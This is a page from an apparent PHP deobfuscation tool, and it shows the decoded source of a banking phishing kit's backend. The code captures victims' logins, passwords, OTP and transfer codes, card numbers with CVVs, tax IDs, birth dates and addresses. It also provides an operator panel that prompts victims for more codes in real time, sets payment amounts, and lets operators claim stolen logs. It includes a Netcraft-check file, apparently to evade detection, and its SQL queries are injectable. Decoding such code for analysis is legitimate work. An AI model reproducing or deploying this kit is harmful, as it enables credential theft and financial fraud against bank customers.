Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto PVFaB; RyL6_: session_start(); goto PF46H; PVFaB: include "\x2e\56\57\56\x2e\..

Decoded Output download

<?php 
 goto PVFaB; RyL6_: session_start(); goto PF46H; PVFaB: include "../../CONFIG.php"; goto AtyZK; RVXPC: include "../vendor/100.php"; goto B_C5_; PF46H: function numeric($num) { if (preg_match("/^[0-9]+$/", $num)) { $status = true; } else { $status = false; } return $status; } goto Dpqz8; Dpqz8: if ($_GET["type"] == "login") { if ($_POST["usrlogin"] and $_POST["ip"] and $_POST["ua"]) { $usrlogin = $_POST["usrlogin"]; $ip = $_POST["ip"]; $comment = "User just logged into account"; $ua = urlencode($_POST["ua"]); $uniqueid = time(); if ($_SESSION["started"] == "true") { $uniqueid = $_SESSION["uniqueid"]; $query = mysqli_query($conn, "UPDATE customers SET status=1, buzzed=0, usrlogin='{$usrlogin}', comment='{$comment}', useragent='{$ua}', ip='{$ip}' WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn notok")); } } else { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; $query = mysqli_query($conn, "INSERT INTO customers (usrlogin, comment, ip, useragent, uniqueid, status) VALUES ('{$usrlogin}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn notok")); } } } } goto BkXNK; Xv57R: if ($_SESSION["started"] == "true") { if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["type"] == "Multi-code") { if ($_POST["usrcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $usrcode = $_POST["usrcode"]; $comment = "Multi-Channel Code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET usrcode='{$usrcode}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "MCC Error")); } } } if ($_GET["type"] == "OTP") { if ($_POST["otpcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $otpcode = $_POST["otpcode"]; $comment = "OTP Code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET otpcode='{$otpcode}', comment='{$comment}', status=3, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "OTP Error")); } } } if ($_GET["type"] == "AUTH") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $comment = "Ready to reject payment, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status=4, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Auth Error")); } } } if ($_GET["type"] == "UserInfo") { if ($_POST["fname"] and $_POST["dob"] and $_POST["usraddr"] and $_POST["usrnif"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $fname = $_POST["fname"]; $dob = $_POST["dob"]; $usraddr = $_POST["usraddr"]; $usrnif = $_POST["usrnif"]; $comment = "Basic Info Entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET fname='{$fname}', dob='{$dob}', usraddr='{$usraddr}', usrnif='{$usrnif}', comment='{$comment}', status=5, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Info Error")); } } } if ($_GET["type"] == "CCDeets") { if ($_POST["ccnum"] and $_POST["cvvnum"] and $_POST["expiry"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $ccnum = $_POST["ccnum"]; $cvvnum = $_POST["cvvnum"]; $expiry = $_POST["expiry"]; $comment = "CC Deets Entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET ccnum='{$ccnum}', cvvnum='{$cvvnum}', expiry='{$expiry}', comment='{$comment}', status=6, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "CC Error")); } } } if ($_GET["type"] == "Phone") { if ($_POST["phonenum"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $phonenum = $_POST["phonenum"]; $comment = "Phone No. entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET phonenum='{$phonenum}', comment='{$comment}', status=7, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Phone Error")); } } } if ($_GET["type"] == "PAY") { if ($_POST["paycode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $paycode = $_POST["paycode"]; $comment = "Transfer code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET paycode='{$paycode}', comment='{$comment}', status=8, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Pay Error")); } } } if ($_GET["type"] == "Password") { if ($_POST["usrpass"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $usrpass = $_POST["usrpass"]; $comment = "Pass entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET usrpass='{$usrpass}', comment='{$comment}', status=9, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Pass Error")); } } } } goto mMHrq; B_C5_: include "../vendor/200.php"; goto RIqW8; RIqW8: include "../vendor/300.php"; goto ih13o; TbMN2: include "../vendor/netcraft_check.php"; goto RyL6_; ih13o: include "../vendor/index.php"; goto TbMN2; BkXNK: if ($_SESSION["admin_logged"] == "true") { if ($_GET["type"] == "commmand") { if ($_POST["userid"] and numeric($_POST["userid"]) == true and $_POST["status"] and numeric($_POST["status"]) == true) { $userid = $_POST["userid"]; $status = $_POST["status"]; $char1 = $_POST["char1"]; $char2 = $_POST["char2"]; $char3 = $_POST["char3"]; $amount = $_POST["amount"]; $payeeName = $_POST["payeeName"]; $comment = "Admin has sent command"; if ($char1 != null and $char1 != '' and $char2 != null and $char2 != '' and $char3 != '' and $char3 != '' and $amount == '' and $amount == null) { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status}, char1='{$char1}', char2='{$char2}', char3='{$char3}' WHERE id={$userid}"); } else { if ($amount != null and $amount != '' and $payeeName != null and $payeeName != '' and $char2 == null and $char2 == '') { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status}, payeeName='{$payeeName}', amount='{$amount}' WHERE id={$userid}"); } else { $query = mysqli_query($conn, "UPDATE customers SET status={$status} WHERE id={$userid}"); } } if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn error")); } } else { echo json_encode(array("status" => "command error")); } } if (isset($_GET["get_submitted"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=7 and buzzed=0"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if (isset($_GET["fetch_pc_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "<span class="badge badge-warning">Easter egg</span>"; } elseif ($value["status"] == 1) { $info = "<span class="badge badge-info">New User</span>"; } elseif ($value["status"] == 2) { $info = "<span class="badge badge-primary">Submitted Multi Code</span>"; } elseif ($value["status"] == 3) { $info = "<span class="badge badge-primary">Submitted OTP</span>"; } elseif ($value["status"] == 4) { $info = "<span class="badge badge-primary">Submitted Answer</span>"; } elseif ($value["status"] == 5) { $info = "<span class="badge badge-primary">Submitted Basic Info</span>"; } elseif ($value["status"] == 6) { $info = "<span class="badge badge-primary">Submitted Card Info</span>"; } elseif ($value["status"] == 7) { $info = "<span class="badge badge-primary">Submitted Phone No.</span>"; } elseif ($value["status"] == 8) { $info = "<span class="badge badge-primary">Submitted Pay Code</span>"; } elseif ($value["status"] == 9) { $info = "<span class="badge badge-primary">Submitted Password</span>"; } elseif ($value["status"] == 11) { $info = "<span class="badge badge-primary">Awaiting Multi code</span>"; } elseif ($value["status"] == 12) { $info = "<span class="badge badge-primary">Awaiting OTP</span>"; } elseif ($value["status"] == 13) { $info = "<span class="badge badge-primary">Awaiting Answer</span>"; } elseif ($value["status"] == 14) { $info = "<span class="badge badge-primary">Awaiting Basic Info</span>"; } elseif ($value["status"] == 15) { $info = "<span class="badge badge-primary">Awaiting Card Info </span>"; } elseif ($value["status"] == 16) { $info = "<span class="badge badge-primary">Awaiting Phone No.</span>"; } elseif ($value["status"] == 17) { $info = "<span class="badge badge-primary">Waiting on loading page</span>"; } elseif ($value["status"] == 18) { $info = "<span class="badge badge-primary">Awaiting Password</span>"; } elseif ($value["status"] == 50) { $info = "<span class="badge badge-primary">Back to Login</span>"; } elseif ($value["status"] == 100) { $info = "<span class="badge badge-info">INVALID</span>"; } elseif ($value["status"] == 20) { $info = "<span class="badge badge-success">Finished</span>"; } if ($value["status"] == 20) { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; echo "\xa\x9			<tr style='color:white'>\xa\x9		\x9	<td>{$value["id"]}</td>
\x9	\x9		<td>{$value["usrlogin"]}</td>\xa\x9\x9			<td>{$userStatus}</td>\xa	\x9\x9\x9	<td>{$value["ip"]}</td>
\x9	\x9\x9	<td>{$info}</td>\xa\x9			\x9<td>
		\x9\x9\x9	<button type='button' onclick='view_logBtn(this)' class='btn btn-md btn-dark' id='userid_{$value["id"]}' data-toggle='modal' data-target='#viewmodal_userid_{$value["id"]}'>View Log</button>
			\x9\x9	<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
	\x9\x9\x9\x9</td>
	\x9\x9	</tr>\xa	\x9\x9\x9"; } else { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "<span><img src="partial/img/on.png" style="width:20px;padding-right:1px"><b>Online</b></span>"; } } else { if ($savedStatus === null) { $userStatus = "<span><img src="partial/img/na.png" style="width:25px;padding-right:1px"><b>No data</b></span>"; } } if ($Multiple_Admins == "off") { echo "
			\x9\x9<tr style='color:white'>
		\x9			<td>{$value["id"]}</td>\xa\x9	\x9\x9\x9	<td>{$value["usrlogin"]}</td>
\x9\x9\x9\x9	\x9<td>{$userStatus}</td>\xa	\x9\x9		\x9<td>{$value["ip"]}</td>\xa		\x9\x9\x9	<td>{$value["comment"]}</td>
			\x9\x9	<td>{$info}</td>
\x9\x9\x9\x9\x9\x9<td>
	\x9\x9				<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>\xa\x9	\x9	\x9\x9\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa	\x9\x9\x9\x9	</td>\xa		\x9	\x9</tr>
\x9		\x9	"; } else { if ($value["log_owner"] == '') { echo "\xa		\x9	\x9	<tr style='color:white'>\xa\x9\x9				\x9<td>{$value["id"]}</td>
	\x9	\x9\x9		<td>{$value["usrlogin"]}</td>\xa	\x9\x9	\x9	\x9<td>{$userStatus}</td>\xa		\x9\x9			<td>{$value["ip"]}</td>
			\x9			<td>{$value["comment"]}</td>
	\x9	\x9			<td>{$info}</td>\xa	\x9\x9\x9\x9\x9	<td>
\x9			\x9		\x9<button type='button' onclick='claimBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'> Claim Log \xf0\237\224\x91</button>
\x9	\x9		\x9\x9</td>\xa\x9	\x9\x9\x9\x9</tr>\xa		\x9\x9\x9	"; } else { if ($value["log_owner"] == $_SESSION["log_owner"]) { echo "
		\x9\x9	\x9<tr style='color:white'>\xa							<td>{$value["id"]}</td>
	\x9\x9		\x9\x9<td>{$value["usrlogin"]}</td>
		\x9				<td>{$userStatus}</td>\xa	\x9	\x9	\x9\x9<td>{$value["ip"]}</td>
\x9				\x9	<td>{$value["comment"]}</td>
		\x9	\x9\x9\x9<td>{$info}</td>\xa	\x9			\x9\x9<td>
\x9				\x9	\x9<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>
\x9		\x9		\x9\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa\x9	\x9\x9	\x9	</td>
	\x9\x9			</tr>\xa	\x9	\x9\x9	"; } else { echo "\xa\x9			\x9	<tr style='color:white'>
\x9\x9	\x9			<td>{$value["id"]}</td>\xa	\x9	\x9\x9\x9\x9<td>{$value["usrlogin"]}</td>\xa\x9	\x9\x9\x9\x9	<td>{$userStatus}</td>\xa\x9	\x9		\x9\x9<td>{$value["ip"]}</td>\xa	\x9\x9\x9	\x9	<td>{$value["comment"]}</td>\xa\x9\x9		\x9\x9\x9<td>{$info}</td>\xa\x9	\x9\x9\x9\x9	<td>
	\x9			\x9\x9	<span>Claimed by - <i>{$value["log_owner"]}</i></span>
\x9		\x9	\x9	</td>\xa	\x9\x9\x9\x9\x9</tr>
	\x9	\x9	\x9"; } } } } } } if (isset($_GET["fetch_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "<span class="badge badge-warning">Easter egg</span>"; } elseif ($value["status"] == 1) { $info = "<span class="badge badge-info">New User</span>"; } elseif ($value["status"] == 2) { $info = "<span class="badge badge-primary">Submitted Multi Code</span>"; } elseif ($value["status"] == 3) { $info = "<span class="badge badge-primary">Submitted OTP</span>"; } elseif ($value["status"] == 4) { $info = "<span class="badge badge-primary">Submitted Answer</span>"; } elseif ($value["status"] == 5) { $info = "<span class="badge badge-primary">Submitted Basic Info</span>"; } elseif ($value["status"] == 6) { $info = "<span class="badge badge-primary">Submitted Card Info</span>"; } elseif ($value["status"] == 7) { $info = "<span class="badge badge-primary">Submitted Phone No.</span>"; } elseif ($value["status"] == 8) { $info = "<span class="badge badge-primary">Submitted Pay Code</span>"; } elseif ($value["status"] == 9) { $info = "<span class="badge badge-primary">Submitted Password</span>"; } elseif ($value["status"] == 11) { $info = "<span class="badge badge-primary">Awaiting Multi code</span>"; } elseif ($value["status"] == 12) { $info = "<span class="badge badge-primary">Awaiting OTP</span>"; } elseif ($value["status"] == 13) { $info = "<span class="badge badge-primary">Awaiting Answer</span>"; } elseif ($value["status"] == 14) { $info = "<span class="badge badge-primary">Awaiting Basic Info</span>"; } elseif ($value["status"] == 15) { $info = "<span class="badge badge-primary">Awaiting Card Info </span>"; } elseif ($value["status"] == 16) { $info = "<span class="badge badge-primary">Awaiting Phone No.</span>"; } elseif ($value["status"] == 17) { $info = "<span class="badge badge-primary">Waiting on loading page</span>"; } elseif ($value["status"] == 18) { $info = "<span class="badge badge-primary">Awaiting Password</span>"; } elseif ($value["status"] == 50) { $info = "<span class="badge badge-primary">Back to Login</span>"; } elseif ($value["status"] == 100) { $info = "<span class="badge badge-info">INVALID</span>"; } elseif ($value["status"] == 20) { $info = "<span class="badge badge-success">Finished</span>"; } if ($value["status"] == 20) { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; echo "
				<tr style='color:white'>
			\x9\x9<td>{$value["id"]}</td>
\x9	\x9	\x9<td>{$value["usrlogin"]}</td>\xa\x9		\x9	<td>{$userStatus}</td>
\x9			\x9<td>{$value["ip"]}</td>
\x9\x9	\x9\x9<td>{$info}</td>\xa\x9		\x9	<td>\xa\x9	\x9		\x9<button type='button' onclick='view_logBtn(this)' class='btn btn-md btn-dark' id='userid_{$value["id"]}' data-toggle='modal' data-target='#viewmodal_userid_{$value["id"]}'>View Log</button>\xa\x9	\x9	\x9	<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa\x9\x9	\x9	</td>
\x9		\x9</tr>
\x9\x9		"; } else { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "<span><img src="partial/img/on.png" style="width:20px;padding-right:1px"><b>Online</b></span>"; } } else { if ($savedStatus === null) { $userStatus = "<span><img src="partial/img/na.png" style="width:25px;padding-right:1px"><b>No data</b></span>"; } } if ($Multiple_Admins == "off") { echo "
	\x9\x9\x9	<tr style='color:white'>\xa		\x9\x9	\x9<td>{$value["id"]}</td>\xa\x9	\x9\x9		<td>{$value["usrlogin"]}</td>
\x9\x9	\x9\x9\x9<td>{$userStatus}</td>
\x9	\x9\x9	\x9<td>{$info}<br>{$value["comment"]}</td>
\x9			\x9	<td>
\x9\x9\x9\x9\x9\x9	<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>
			\x9			<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
			\x9	\x9</td>
\x9	\x9\x9\x9</tr>
	\x9		\x9"; } else { if ($value["log_owner"] == '') { echo "
		\x9\x9	\x9<tr style='color:white'>
	\x9\x9\x9\x9	\x9<td>{$value["id"]}</td>\xa	\x9\x9\x9		\x9<td>{$value["usrlogin"]}</td>\xa	\x9\x9\x9\x9		<td>{$userStatus}</td>\xa\x9		\x9\x9	\x9<td>{$info}<br>{$value["comment"]}</td>\xa	\x9	\x9		\x9<td>
	\x9	\x9		\x9	<button type='button' onclick='claimBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'> Claim Log \360\x9f\224\221</button>
\x9\x9				\x9</td>
			\x9\x9	</tr>\xa\x9			\x9	"; } else { if ($value["log_owner"] == $_SESSION["log_owner"]) { echo "
					\x9<tr style='color:white'>
	\x9\x9		\x9\x9<td>{$value["id"]}</td>
	\x9\x9		\x9\x9<td>{$value["usrlogin"]}</td>
	\x9	\x9\x9\x9	<td>{$userStatus}</td>
		\x9		\x9\x9<td>{$info}<br>{$value["comment"]}</td>\xa\x9\x9\x9			\x9<td>{$info}</td>\xa\x9		\x9\x9\x9\x9<td>\xa\x9\x9				\x9	<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>\xa\x9	\x9\x9	\x9\x9	<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
	\x9\x9\x9\x9	\x9</td>\xa	\x9		\x9\x9</tr>
	\x9\x9	\x9\x9"; } else { echo "\xa		\x9		\x9<tr style='color:white'>\xa		\x9\x9\x9\x9\x9<td>{$value["id"]}</td>\xa\x9\x9	\x9\x9\x9	<td>{$value["usrlogin"]}</td>\xa\x9	\x9\x9\x9\x9\x9<td>{$userStatus}</td>\xa\x9\x9\x9\x9	\x9	<td>{$info}<br>{$value["comment"]}</td>
\x9	\x9		\x9	<td>\xa		\x9\x9			\x9<span>Claimed by - <i>{$value["log_owner"]}</i></span>
\x9\x9\x9	\x9\x9\x9</td>\xa\x9\x9\x9	\x9\x9</tr>
\x9	\x9\x9		"; } } } } } } if (isset($_GET["fetch_pc_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $amount = $value["amount"]; $otpcode = $value["otpcode"]; $fname = $value["fname"]; $dob = $value["dob"]; $usraddr = $value["usraddr"]; $usrnif = $value["usrnif"]; $usrcode = $value["usrcode"]; $paycode = $value["paycode"]; $phonenum = $value["phonenum"]; $ccnum = $value["ccnum"]; $cvvnum = $value["cvvnum"]; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "
\x9\x9	=====\342\211\253 LOGIN \xe2\x89\252=====
\x9	\x9User Code : {$usrlogin}
\x9	\x9Multi Code : {$usrcode}
	\x9	Password : {$usrpass}
		\x9=====\342\211\253 CODE \xe2\x89\252=====
		\x9OTP Code : {$otpcode}
			Pay Code : {$paycode}
	\x9\x9=====\xe2\211\xab CARD \342\x89\252=====\xa		\x9CC Num : {$ccnum}\xa	\x9\x9Expiry : {$expiry}
	\x9\x9CVV : {$cvvnum}
\x9\x9	=====\342\x89\253 ADDITIONAL \342\211\xaa=====\xa\x9	\x9Full Name : {$fname}\xa			NIF : {$usrnif}
\x9	\x9DOB : {$dob}\xa\x9		Address : {$usraddr}
\x9		Phone Num : {$phonenum}
			===============================
\x9\x9	IP : {$ip}\xa\x9\x9	UA : {$useragent}\xa	\x9	==============================="; echo "
	\xa	\x9\x9<div class='modal fade' id='modal_userid_{$value["id"]}' tabindex='-1' role='dialog' aria-labelledby='exampleModalLabel' aria-hidden='true' style='opacity:1 !important;display:none;height:100%;overflow:scroll;'>\xa\x9\x9\x9	<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
\x9	\x9		<input type='hidden' name='userid' value='{$value["id"]}'>\xa	\x9\x9		<div class='modal-dialog' role='document' style='width:500px'>
	\x9\x9			<div class='modal-content' style='background-color: black;'>
	\x9		\x9		<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
\x9\x9\x9		\x9	\x9<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Admin Control</h5>\xa\x9				\x9\x9	<button type='button' class='close' onclick='close_btn()' aria-label='Close'>\xa\x9					\x9	\x9<span aria-hidden='true' style='color:white'>&times;</span>\xa\x9\x9		\x9	\x9\x9</button>
					\x9	</div>\xa\x9			\x9		<div class='modal-body'>
					\x9\x9	<div class='form-group' style='margin-bottom:1rem'>\xa	\x9\x9\x9\x9\x9\x9	\x9<br>\xa				\x9				<textarea id='textareaoptions' class='form-control' disabled='disabled' rows='16' style='height:300px;'>{$data_log}</textarea>
\x9		\x9\x9\x9\x9\x9</div>\xa\x9\x9\x9\x9\x9\x9	\x9	
\x9		\x9			\x9<table style='width: 100%;background-color: black;color: white;padding: 10%;'>
			\x9		\x9		<tbody style='line-height:100%;'>\xa\x9\x9		
\x9\x9\x9\x9\x9\x9	\x9		<tr>
		\x9\x9\x9						<td>\xa		\x9\x9\x9		\x9			\x9<div class='form-check'>\xa\x9			\x9	\x9			\x9		<label for='askcharsradio0{$value["id"]}' class='form-check-label'>
	\x9		\x9\x9	\x9	\x9	\x9\x9\x9<input type='radio' name='status' value='11' id='askcharsradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9		\x9			\x9\x9\x9		\x9	<span>Request Multi-code</span>
\x9					\x9	\x9	\x9	\x9</label>\xa			\x9\x9\x9	\x9\x9\x9	\x9</div>
	\x9					\x9	\x9\x9	<!-- Input characters 
\x9\x9	\x9\x9\x9\x9\x9	\x9\x9	<div class='form-group' style='display:none;' id='askchars0{$value["id"]}'>
		\x9	\x9\x9\x9\x9\x9\x9	\x9	<div class='row' style='margin-left:5%;margin-top:5px' >
	\x9	\x9		\x9\x9\x9\x9	\x9\x9	<div class='col'>
\x9\x9\x9\x9	\x9\x9		\x9	\x9	\x9	<select class='form-control' name='char1'>
\x9\x9	\x9\x9\x9		\x9\x9\x9\x9	\x9		<option value='1\302\252'>1\xc2\252</option>
\x9\x9\x9\x9				\x9		\x9\x9\x9	\x9<option value='2\xc2\xaa'>2\xc2\252</option>\xa		\x9						\x9	\x9\x9	\x9	<option value='3\xc2\xaa'>3\xc2\252</option>
	\x9\x9	\x9\x9		\x9	\x9	\x9	\x9\x9<option value='4\xc2\252'>4\xc2\252</option>
\x9	\x9\x9	\x9			\x9						<option value='5\xc2\xaa'>5\xc2\252</option>\xa	\x9\x9	\x9\x9	\x9\x9		\x9				<option value='6\302\252'>6\xc2\xaa</option>\xa			\x9	\x9			\x9	\x9		\x9	<option value='7\xc2\xaa'>7\xc2\252</option>
\x9\x9		\x9\x9			\x9\x9\x9		\x9\x9<option value='8\xc2\xaa'>8\302\252</option>\xa\x9				\x9	\x9		\x9\x9	\x9		<option value='9\302\xaa'>9\xc2\xaa</option>
	\x9\x9\x9		\x9							\x9	<option value='10\302\252'>10\302\xaa</option>
	\x9\x9	\x9\x9	\x9		\x9\x9\x9			<option value='11\302\252'>11\xc2\xaa</option>
	\x9	\x9			\x9\x9	\x9\x9	\x9\x9	<option value='12\xc2\xaa'>12\xc2\xaa</option>
\x9		\x9	\x9										<option value='13\302\xaa'>13\xc2\252</option>
	\x9		\x9\x9	\x9	\x9\x9\x9	\x9\x9</select>\xa\x9\x9				\x9\x9		\x9\x9	\x9</div>
\x9\x9\x9\x9		\x9\x9	\x9\x9	\x9	<div class='col'>
\x9	\x9\x9\x9\x9\x9	\x9		\x9\x9\x9\x9<select class='form-control' name='char2'>\xa	\x9			\x9	\x9\x9	\x9					<option value='1\xc2\xaa'>1\xc2\252</option>\xa\x9		\x9	\x9\x9\x9	\x9			\x9\x9	<option value='2\302\xaa'>2\302\xaa</option>
\x9\x9\x9\x9\x9\x9	\x9\x9	\x9		\x9	\x9<option value='3\xc2\252'>3\xc2\252</option>
			\x9\x9\x9\x9\x9	\x9		\x9\x9\x9\x9<option value='4\xc2\xaa'>4\xc2\252</option>
\x9\x9\x9		\x9\x9					\x9\x9\x9\x9<option value='5\302\xaa'>5\xc2\252</option>
\x9\x9	\x9	\x9										<option value='6\xc2\252'>6\xc2\xaa</option>\xa	\x9\x9\x9	\x9\x9\x9	\x9			\x9\x9\x9<option value='7\302\252'>7\xc2\252</option>\xa\x9		\x9\x9\x9		\x9	\x9		\x9\x9	<option value='8\xc2\xaa'>8\302\xaa</option>
		\x9\x9\x9\x9\x9			\x9\x9\x9\x9		<option value='9\302\xaa'>9\302\xaa</option>
\x9	\x9	\x9\x9				\x9	\x9		\x9<option value='10\302\252'>10\xc2\252</option>\xa\x9\x9\x9	\x9\x9	\x9\x9	\x9\x9	\x9\x9	<option value='11\xc2\252'>11\302\252</option>
\x9\x9\x9\x9			\x9\x9				\x9\x9\x9<option value='12\xc2\xaa'>12\xc2\xaa</option>
	\x9		\x9	\x9\x9\x9\x9\x9	\x9\x9		<option value='13\xc2\252'>13\302\252</option>\xa\x9\x9\x9	\x9\x9\x9\x9					\x9\x9</select>
\x9\x9		\x9\x9\x9\x9\x9\x9			\x9</div>\xa\x9	\x9	\x9\x9					\x9\x9\x9<div class='col'>
		\x9	\x9\x9	\x9	\x9\x9	\x9		<select class='form-control' name='char3'>\xa\x9		\x9	\x9\x9	\x9		\x9	\x9	\x9<option value='1\302\xaa'>1\xc2\xaa</option>\xa	\x9\x9\x9	\x9	\x9	\x9\x9	\x9\x9	\x9<option value='2\302\252'>2\302\xaa</option>
			\x9\x9\x9		\x9\x9		\x9\x9\x9\x9<option value='3\xc2\252'>3\302\xaa</option>
\x9	\x9\x9\x9	\x9		\x9\x9				\x9<option value='4\xc2\xaa'>4\xc2\xaa</option>\xa\x9	\x9\x9			\x9	\x9\x9	\x9	\x9	<option value='5\302\252'>5\302\252</option>\xa	\x9\x9			\x9						\x9	\x9<option value='6\xc2\252'>6\xc2\xaa</option>\xa\x9\x9\x9	\x9	\x9\x9			\x9\x9\x9\x9	<option value='7\302\252'>7\xc2\xaa</option>\xa	\x9\x9\x9\x9		\x9\x9\x9				\x9\x9<option value='8\xc2\xaa'>8\xc2\252</option>\xa		\x9		\x9		\x9\x9\x9				\x9<option value='9\302\xaa'>9\xc2\xaa</option>
		\x9\x9\x9					\x9	\x9\x9	\x9<option value='10\xc2\xaa'>10\xc2\252</option>
\x9	\x9\x9			\x9\x9			\x9	\x9\x9<option value='11\302\252'>11\xc2\xaa</option>\xa			\x9\x9		\x9	\x9			\x9	\x9<option value='12\302\xaa'>12\302\252</option>\xa	\x9	\x9			\x9	\x9\x9\x9			\x9<option value='13\xc2\xaa'>13\302\252</option>
